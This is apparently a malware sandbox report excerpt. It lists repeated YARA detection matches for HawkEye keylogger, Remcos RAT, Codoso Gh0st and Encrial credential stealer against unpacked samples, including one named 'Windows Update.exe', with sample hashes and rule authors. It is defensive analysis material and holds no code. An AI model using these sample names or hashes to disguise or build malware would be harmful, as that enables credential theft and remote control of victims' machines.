                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.76b0000.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
